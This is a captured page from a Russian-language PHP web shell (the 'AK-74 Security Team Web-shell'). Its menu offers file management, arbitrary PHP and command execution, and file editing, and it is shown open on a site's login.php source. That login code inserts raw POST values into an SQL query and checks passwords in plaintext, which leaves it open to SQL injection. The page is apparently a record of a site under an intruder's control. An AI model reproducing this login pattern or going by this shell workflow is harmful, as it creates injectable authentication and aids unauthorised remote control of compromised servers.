.:: :[ AK-74 Security Team Web-shell ]: ::.
Общая информация
Файловый менеджер
phpinfo()
Выполнить PHP
Выполнить команду
Редактирование файла
<?php include ("../include/config.php"); include ("../include/connect.php"); include ("../include/function.php"); if ($_POST['Action'] == "Login") { $sql = "select * from s_user where s_user.username like '".$_POST['login_name']."' and s_user.password like '".$_POST['passwd']."'"; $query = sql_query ($sql); if ($rec = sql_fetch_array($query)) { $_SESSION["login_id"] = $rec["user_id"]; $_SESSION["login_name"] = $rec["username"]; $_SESSION["admin_flag"] = $rec["admin_flag"]; $_SESSION["check_admin"] = $rec["admin_flag"]; //header ("location:welcome/$configMyFile"); ?> <script language="javascript"> window.location = 'welcome/<?php echo $configMyFile?>'; </script> <?php exit(); } } ?> <html> <head> <link rel="shortcut icon" href="/favicon.ico"> <title>MsnLadyboy.com</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/> <link href="custom.css" rel="stylesheet" type="text/css"> <link href="general.css" rel="stylesheet" type="text/css"> <link href="layout.css" rel="stylesheet" type="text/css"> </head> <script> <!-- function setFocus() { if (document.forms[0].login_name) { document.forms[0].login_name.focus(); document.forms[0].login_name.select(); } } //--> </script> <body onLoad="setFocus()"><?php include ("include/top.php"); ?> <table width="100%" cellspacing="0" cellpadding="0" border="0"><tr> <td><?php include ("include/left.php"); ?></td> <td> <a name="top"></a> <br> <form name="form3" method="post" action="login.php"> <table width="453" align="center" cellpadding="0" cellspacing="0"> <tr> <td height="60" background="icons/login-header.gif"> </td> </tr> <tr> <td id="loginForm"> <p>Enter the login name into "Login" and password into the "Password" fields respectively. Then click "Login".</p> <table class="formFields" cellspacing="0" width="100%"> <tr> <td class="name"><label for="login_name"> Login</label></td> <td><input type="text" name="login_name" id="login_name" value="" size="25" maxlength="255" tabindex="1"></td> </tr> <tr> <td class="name"><label for="passwd"> Password</label></td> <td><input type="password" name="passwd" id="passwd" size="25" maxlength="14" tabindex="2"></td> </tr> </table> <div class="formButtons"> <table width="100%" cellspacing="0"> <tr> <td class="main" id="get_password"> Forgot your password? </td> <td class="misc"> <input name="Action" type="hidden" id="Action" value="Login"> <input type="submit" name="Submit" value="Submit"> </td> </tr> </table> </div></td> </tr> </table> </form> <script> setFocus(); </script> </td></tr></table> </body> </html>
Rename:
-